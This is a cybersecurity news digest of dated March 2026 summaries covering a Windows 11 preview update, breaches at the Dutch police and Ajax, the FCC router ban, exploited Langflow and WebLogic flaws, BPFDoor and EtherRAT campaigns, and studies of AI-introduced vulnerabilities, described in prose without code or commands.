Microsoft released KB5079391, a non-security preview cumulative update for Windows 11 versions 24H2 and 25H2, introducing toggle functionality for Smart App Control without OS reinstallation and multiple display reliability improvements. The update, part of Microsoft’s end-of-month non-security preview schedule, enables users to enable or disable Smart App Control through Windows Security settings, expanding accessibility beyond clean installations. Additionally, it adds support for monitors reporting refresh rates exceeding 1000 Hz, native USB4 monitor connections, and improved HDR reliability. The optional update targets builds 26200.8116 for 25H2 and 26100.8116 for 24H2, addressing performance, stability, and user interface refinements.

Dutch National Police phishing incident leads to limited breach with ongoing investigation

First: 27.03.2026 10:20 · 📰 1 src / 1 article

The Dutch National Police (Politie) confirmed a phishing attack resulted in a limited security breach, with attackers' access blocked shortly after detection by the Security Operations Center. The incident did not expose or access citizens' data or investigative information, and a criminal investigation has been launched. The timing of detection and potential exposure of employees' data remain undisclosed. This follows a prior 2024 breach attributed to a state actor, which stole work-related and private contact information for police officers. Enhanced security measures, including two-factor authentication and continuous monitoring, were implemented post-2024 but did not prevent the recent phishing incident.

Ajax Amsterdam systems breach enables ticket manipulation and limited fan data exposure

First: 26.03.2026 22:37 · 📰 1 src / 1 article

A threat actor exploited vulnerabilities in Ajax Amsterdam’s IT systems to access limited fan data and manipulate ticket assignments and stadium bans. The incident affected a few hundred individuals, with fewer than 20 stadium bans compromised, including names, email addresses, and dates of birth. The attacker demonstrated the ability to reassign season tickets and modify existing stadium bans before disclosing the flaws to media outlets. The club has patched vulnerabilities, engaged external investigators, and notified Dutch authorities. No evidence of data leakage has been identified.

Decline in physically impactful OT cyberattacks observed in 2025

First: 26.03.2026 22:33 · 📰 1 src / 1 article

The total number of major operational technology (OT) cyber incidents causing physical consequences decreased by 25% in 2025, reversing a seven-year upward trend. Major OT cyberattacks fell from 76 in 2024 to 57 in 2025 according to Waterfall Security Solutions’ annual report, marking the first decline since 2018. The reduction contrasts with historical increases driven by ransomware and exposed industrial control systems, though many of the remaining 2025 incidents remained severe despite lower technical sophistication. The shift raises questions about underlying drivers, including improved defenses, underreporting due to legal risks, or fluctuations in ransomware ecosystem dynamics.

FCC Covered List expansion bans foreign-made consumer routers in U.S. market

Updated: 26.03.2026 21:48 · First: 24.03.2026 22:41 · 📰 4 src / 4 articles

The U.S. Federal Communications Commission (FCC) has expanded its Covered List to prohibit the sale of new consumer-grade routers manufactured outside the United States, citing unacceptable national security risks. The ban targets 'consumer-grade' routers as defined in NIST Internal Report 8425A, while permitting continued operation of existing routers and maintaining imports for previously authorized foreign-manufactured models. The decision follows a March 20 National Security Determination identifying severe supply-chain vulnerabilities in foreign-made routers. Exemptions are strictly limited to Department of Defense or Department of Homeland Security drone and surveillance systems, with no blanket exclusions for foreign-made consumer routers. Existing hardware and U.S.-manufactured devices like Starlink routers remain unaffected. Critics warn the policy may leave consumers and businesses reliant on older, less secure routers as replacement markets shrink and compliance costs rise, potentially increasing long-term exposure to operational vulnerabilities rather than reducing them.

76 Zero-Day Exploits Demonstrated at Pwn2Own Automotive 2026

Updated: 26.03.2026 21:48 · First: 21.01.2026 14:16 · 📰 5 src / 8 articles

Security researchers have demonstrated 76 zero-day vulnerabilities in automotive systems during Pwn2Own Automotive 2026, earning $1,047,000 in cash awards. Affected systems include in-vehicle infotainment (IVI) units, EV chargers, and automotive-grade Linux, with exploits targeting Tesla, Sony, ChargePoint, and other vendors. The competition, held in Tokyo from January 21 to 23, 2026, highlighted the persistent insecurity of IT and OT components in vehicles, particularly aftermarket IVI systems and charging infrastructure. The contest revealed that EV chargers, despite improvements, retain a large attack surface, and banned previously known unpatched vulnerabilities from infotainment systems. Vendors have 90 days to develop and release security fixes before disclosure. Team Fuzzware.io secured the top prize with $215,000, followed by Team DDOS ($100,750) and Synacktiv ($85,000). Experts at RSAC 2026 emphasized that modern vehicles are effectively 'computers on wheels,' with attack surfaces expanding alongside connectivity and autonomous driving capabilities. The automotive industry continues to grapple with securing complex systems reliant on millions of lines of code, often developed by disparate suppliers without deep cybersecurity expertise. Regulatory frameworks like UN Regulation No. 155 now mandate cybersecurity assessments and secure development practices for vehicles across 63 countries.

Langflow unauthenticated RCE vulnerability (CVE-2026-33017) exploited within 20 hours of disclosure

Updated: 26.03.2026 21:17 · First: 20.03.2026 12:20 · 📰 3 src / 3 articles

CISA formally confirmed active exploitation of the Langflow unauthenticated RCE vulnerability (CVE-2026-33017) on March 26, 2026, adding it to the Known Exploited Vulnerabilities (KEV) catalog and mandating U.S. federal agencies to apply mitigations or stop using the product by April 8, 2026. Threat actors exploited the flaw within 20–24 hours of its March 17, 2026 disclosure, progressing from automated scanning to staged Python payload delivery and credential harvesting (including .env and .db files) despite the absence of public PoC code. The vulnerability, with a CVSS score of 9.3, affects all Langflow versions prior to and including 1.8.1 and stems from an unsandboxed exec() call in the /api/v1/build_public_tmp/{flow_id}/flow endpoint. CISA did not attribute exploitation to ransomware actors but emphasized the risk to AI workflows given Langflow’s widespread adoption, including 145,000 GitHub stars. Endor Labs reported that attackers likely reverse-engineered exploits from the advisory details, underscoring the accelerating weaponization timeline. Mitigation guidance includes upgrading to version 1.9.0+ or disabling the vulnerable endpoint, restricting internet exposure, monitoring outbound traffic, and rotating all associated credentials.

BPFDoor Linux kernel implants leveraged by Red Menshen for stealthy telecom espionage

First: 26.03.2026 19:40 · 📰 1 src / 1 article

A China-nexus threat group, tracked as Red Menshen (aka Earth Bluecrow, DecisiveArchitect, Red Dev 18), has conducted a multi-year espionage campaign targeting telecom providers in the Middle East and Asia by deploying stealthy Linux kernel-level implants. The adversary abuses Berkeley Packet Filter (BPF) functionality to embed passive backdoors (BPFDoor) that activate via crafted network packets, avoiding detectable listeners or C2 channels. Initial access is obtained via internet-facing edge services (e.g., VPNs, firewalls) from vendors including Ivanti, Cisco, Juniper, Fortinet, VMware, Palo Alto, and Apache Struts. Post-exploitation includes deployment of frameworks like CrossC2 and Sliver, alongside credential harvesting tools, enabling lateral movement. BPFDoor’s functionality extends to telecom-native protocols (e.g., SCTP), potentially granting visibility into subscriber behavior, location tracking, and surveillance of high-value targets. A newly documented variant enhances evasion by concealing trigger packets within legitimate HTTPS traffic at fixed byte offsets and introducing ICMP-based lightweight communication between infected hosts.

Surge in CVE-classified vulnerabilities linked to AI-generated code in production environments

First: 26.03.2026 18:40 · 📰 1 src / 1 article

Researchers at Georgia Tech’s Systems Software & Security Lab (SSLab) report a significant increase in vulnerabilities directly introduced by AI coding tools, with at least 35 new CVE entries disclosed in March 2026 alone—up from six in January and 15 in February. The findings, part of the Vibe Security Radar project launched in May 2025, track flaws across multiple public advisories (NVD, GHSA, OSV, RustSec) and confirm 74 cases where AI tool signatures (e.g., co-author tags, bot emails) were present in vulnerability-introducing commits. Anthropic’s Claude Code is the most frequently identified tool, though underreporting is suspected due to metadata stripping and lack of traces in tools like GitHub Copilot.

Observed immediate exploitation of Oracle WebLogic CVE-2026-21962 via automated campaigns

First: 26.03.2026 18:00 · 📰 1 src / 1 article

A critical Oracle WebLogic remote code execution (RCE) vulnerability, tracked as CVE-2026-21962 with CVSS score 10.0, underwent rapid weaponization within hours of public exploit code release in January 2026. Automated scanning and exploitation campaigns leveraging the flaw were detected targeting internet-exposed WebLogic servers globally, with the first exploitation attempt recorded on January 22, 2026—the same day exploit code was published. Threat actors predominantly utilized rented virtual private servers from mainstream cloud providers to conduct attacks. The observed activity underscores the immediate operational risk posed by newly disclosed high-severity WebLogic vulnerabilities and highlights continued reliance on long-standing, known-vulnerable endpoints for mass exploitation.

EtherRAT Malware Leverages Ethereum Smart Contracts for C2 Evasion and Cryptocurrency Theft

First: 26.03.2026 17:00 · 📰 1 src / 1 article

A newly identified EtherRAT campaign employs Ethereum smart contracts to host and rotate command-and-control (C2) infrastructure, evading traditional takedown mechanisms. The malware, observed in a March 2026 retail sector incident response, delivers a Node.js-based backdoor after initial access via ClickFix attacks and Microsoft Teams–based IT support scams. Once deployed, EtherRAT exfiltrates system data, steals cryptocurrency wallets and cloud credentials, and blends malicious traffic with legitimate CDN requests. The attack chain includes obfuscated scripts, encrypted payloads, and Windows registry persistence, with C2 addresses retrieved dynamically from Ethereum smart contracts via public RPC endpoints. Operators can update C2 infrastructure by writing new data to contracts, enabling low-cost retooling and sustained access.

Frontier AI dependency recommendations found to generate flawed upgrade and patch guidance

First: 26.03.2026 16:44 · 📰 1 src / 1 article

A study by Sonatype analyzing 258,000 AI-generated dependency upgrade recommendations across Maven Central, npm, PyPI, and NuGet from June to August 2025 revealed that frontier AI models—including GPT-5.2, Claude Sonnet 3.7/4.5, Claude Opus 4.6, and Gemini 2.5 Pro/3 Pro—frequently produce hallucinated or incorrect upgrade paths, security fixes, and version recommendations. Nearly 28% of recommendations from earlier models were hallucinations, while even improved frontier models introduced faulty advice, leaving critical and high-severity vulnerabilities unresolved in production environments. The issue stems from the models’ lack of real-time dependency, vulnerability, compatibility, and enterprise policy context, leading to wasted developer time, unresolved exposures, and increased technical debt. Notably, some recommendations introduced known vulnerabilities into AI tooling stacks themselves, exacerbating risk within the models’ own infrastructure.

TikTok for Business credential harvesting via Cloudflare-hosted phishing reverse proxy

First: 26.03.2026 16:09 · 📰 1 src / 1 article

Threat actors are conducting a phishing campaign targeting TikTok for Business accounts, using Cloudflare-hosted reverse proxy pages to harvest credentials and session cookies, bypassing two-factor authentication. The campaign uses domains registered on March 24 via NiceNIC and hosted on a Google Storage bucket, impersonating TikTok for Business and Google Careers pages. Victims are lured via a Google Storage redirect with Cloudflare Turnstile bot protection to malicious pages that request email validation before presenting a fake login interface. Impact includes potential account takeover, ad fraud, malware distribution, and cryptocurrency scams leveraging compromised business accounts.

WhatsApp expands AI features, multi-account support, and anti-scam protections in latest update

First: 26.03.2026 16:06 · 📰 1 src / 1 article

Meta has introduced several new features for WhatsApp, including AI-powered message drafting and image retouching, multi-account support on iOS, chat history transfer between iOS and Android, and enhanced anti-scam protections. The AI features operate under a privacy model called Private Processing, which ensures message content remains inaccessible to Meta or WhatsApp. Additionally, the update includes tools for media file management and parental controls for pre-teens. These changes aim to improve usability, privacy, and security across the platform.

Multi-stage fraud campaigns leveraging automation, proxies, and credential stuffing bypass single-signal defenses

First: 26.03.2026 16:00 · 📰 1 src / 1 article

Modern fraud attacks follow structured, multi-stage chains where different tools and operators handle each phase, from automated signups to account takeovers and monetization. Attackers rotate infrastructure and mix tactics to evade single-signal detection, often using aged or compromised credentials and residential proxies to appear legitimate. Fraudsters blend automated bot traffic with human-operated sessions, exploiting gaps between siloed defenses such as IP reputation, email, device fingerprinting, and identity verification. This coordinated approach enables credential stuffing, synthetic identity fraud, and high-value transaction abuse, with attackers adapting tools as they move from signup to monetization. Effective mitigation requires correlating hundreds or thousands of signals—IP, device, identity, and behavior—across the entire attack lifecycle to detect coordinated abuse patterns rather than isolated anomalies.

Escalation of AI-enabled threats driving new defense priorities amid criminal adoption

First: 26.03.2026 15:15 · 📰 1 src / 1 article

AI has rapidly become a central capability for both cyber threat actors and defenders, with criminals leveraging it to enhance malware development, automate reconnaissance, and scale phishing and social engineering across languages and platforms. Corporate security leaders now prioritize AI investments in response, while threat actors use publicly available agentic AI tools to conduct autonomous penetration testing-style attacks. Concerns are rising that AI will fuel a sustained increase in both the volume and sophistication of threats across a broader threat actor base, though AI is also positioned as a critical enabler for rapid detection and automated defense.

Seizure of major cybercrime forum LeakBase and arrest of suspected owner

First: 26.03.2026 14:50 · 📰 1 src / 1 article

Russian law enforcement arrested a Taganrog resident suspected of founding and administering the LeakBase cybercrime forum in the Rostov region on March 26, 2026. The forum, active since 2021 and previously supported by the ARES threat group, served as a major hub for cybercriminals to trade stolen data, hacking tools, and related services, accumulating over 142,000 members after the Breached forum’s closure in March 2023. The arrest follows a coordinated international takedown codenamed Operation Leak, executed by law enforcement agencies across 15 countries including the U.S., U.K., and multiple EU states, resulting in approximately 100 enforcement actions, including raids, interviews, arrests, and domain seizure.

OpenAI’s Safety Bug Bounty Program Expands AI Abuse and Integrity Risk Coverage

First: 26.03.2026 14:20 · 📰 1 src / 1 article

OpenAI introduced a new Safety Bug Bounty program on March 26, 2026, hosted on Bugcrowd, to incentivize researchers to report AI abuse and safety risks in its products. The program targets scenarios such as agentic risks (e.g., prompt injection, data exfiltration, MCP abuse), integrity violations (e.g., bypassing anti-automation controls, evading account restrictions), and proprietary information exposure. It complements OpenAI’s existing Security Bug Bounty, which since April 2023 has rewarded 409 security vulnerabilities.

RedLine infostealer operational administrator extradited to face US charges

First: 26.03.2026 13:51 · 📰 1 src / 1 article

An Armenian national, Hambardzum Minasyan, was extradited to the United States to face criminal charges for allegedly administering infrastructure supporting RedLine, a prolific infostealer malware operation. Minasyan is accused of registering virtual private servers, domains, and cryptocurrency accounts used by the RedLine gang, including for receiving affiliate payments and distributing malware. He allegedly managed command-and-control servers and administrative panels while providing support to affiliates and conspiring to steal financial data. If convicted, he faces up to 30 years in prison on charges including access device fraud and money laundering conspiracy.